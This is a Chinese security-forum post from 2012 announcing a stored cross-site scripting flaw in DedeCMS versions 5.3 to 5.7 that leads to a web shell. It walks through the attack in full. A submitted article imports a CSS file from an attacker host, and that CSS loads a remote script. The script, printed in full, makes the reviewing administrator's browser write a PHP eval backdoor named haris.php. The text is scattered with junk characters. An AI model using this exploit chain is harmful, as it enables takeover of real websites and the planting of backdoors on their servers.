找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1875|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell( B9 s8 d& v) @/ {3 J6 y
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)+ H4 O/ H6 ^0 A; T) F4 @: ]
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
! O- K1 n% Z+ v* e下面说说利用方法。
# U$ p8 `' D: ]: D% o/ q% i0 \条件有2个:
/ S; V  [4 {6 B3 }1 x1.开启注册( W% G2 t" n8 y. n
2.开启投稿
* A; a; i. Z4 m) e注册会员----发表文章0 E0 Y& g* C/ F; c) Y
内容填写:! ]. e' k) O1 ~9 w, l
复制代码! [( J- g. U, J! ?9 e
<style>@im\port'\http://xxx.com/xss.css';</style>6 p, i$ _6 y6 r
新建XSS.Css2 U5 P; _- R" O! M) i" ]
复制代码5 f- r; }2 f# |" D3 `
.body{
: s, L# U) x. Lbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }( o6 R1 [7 Q8 T2 B  X: h1 [
新建xss.js 内容为
/ B) h) g, J$ n- ^复制代码( B. i6 m4 G5 G, f
1.var request = false;
: U/ d- r4 V; H" E/ c2.if(window.XMLHttpRequest) {
0 z7 }! x/ ]% U5 f) j& w% F3.request = new XMLHttpRequest();
7 Z% r6 o0 n. h8 o; r$ l) i4.if(request.overrideMimeType) {
" _0 w& p- ~5 P& Z5.request.overrideMimeType('text/xml');" X4 A5 h# F, V* a- v
6.}
) p, B' Z: Z5 e" e" B5 F7.} else if(window.ActiveXObject) {8 H" Y3 @, m  x; i( b7 S& t
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
* A- k! Y/ l/ U- J2 ^9.for(var i=0; i<versions.length; i++) {$ L1 x+ C6 O4 `9 Z. i3 E/ k
10.try {
0 }0 q% M" k5 F& \3 ]6 R6 c11.request = new ActiveXObject(versions);
) K; c" t' ?7 x5 L. L. i4 L/ x% h12.} catch(e) {}5 W" J6 D7 y% R4 K' b
13.}2 h5 \9 y" I5 R" w( t
14.}
5 m( L4 G# V/ r( \/ y( u15.xmlhttp=request;' I3 \9 z4 q- f. S! |3 t
16.function getFolder( url ){
! z( C$ ?" b4 M17. obj = url.split('/'): ]0 h5 A8 `+ U, e
18. return obj[obj.length-2]
- R9 ^4 ^) B( j5 \. r19.}3 s7 c  G5 k( s3 M8 Y- f5 k* }" }
20.oUrl = top.location.href;+ C/ x# W( r( `$ U3 Z) Q
21.u = getFolder(oUrl);- e% e9 L! a; b% j
22.add_admin();
. ?) b9 ~; B! f+ f23.function add_admin(){
. p5 H6 s  U; t$ g* ?24.var url= "/"+u+"/sys_sql_query.php";& r/ e* J' C4 N$ \3 B
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";9 M! e1 @  c% {, \
26.xmlhttp.open("POST", url, true);
+ B; h# P2 {3 P0 _. z27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
( P8 e, ]" ?* t  G: y4 N' t+ O28.xmlhttp.setRequestHeader("Content-length", params.length);
, h$ |! \+ l/ E2 C, g8 _8 c/ Y29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");  h& M* }( P3 w, R0 c
30.xmlhttp.send(params);
+ ?0 m) ^' G" }/ e+ O5 w# l31.}1 |. L5 `$ \. \$ t9 G  j
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表